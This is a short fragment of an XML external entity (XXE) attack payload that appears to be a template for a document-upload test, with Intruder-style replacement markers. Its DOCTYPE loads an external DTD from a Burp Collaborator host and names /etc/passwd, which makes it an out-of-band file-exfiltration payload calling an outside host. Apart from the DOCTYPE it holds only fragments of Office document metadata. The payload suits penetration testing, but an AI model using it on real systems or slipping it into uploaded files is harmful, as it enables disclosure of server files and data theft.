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!DOCTYPE roottag
  PUBLIC '-//OXML/XXE/EN'
  'http://4joazvj7b2sm0dbzt3xgtzs10s6ju8.burpcollaborator.net/a.dtd//etc/passwd'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0B79-0190-4FC5-A76E-B3CB2A1A77A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F398-1F4B-458B-BE6D-F23AE9E7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§Replace2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F398-1F4B-458B-BE6D-F23AE9E790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§Replace1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2015-02-27T15:32:30Z</dcterms:modified>
</cp:coreProperties>
</file>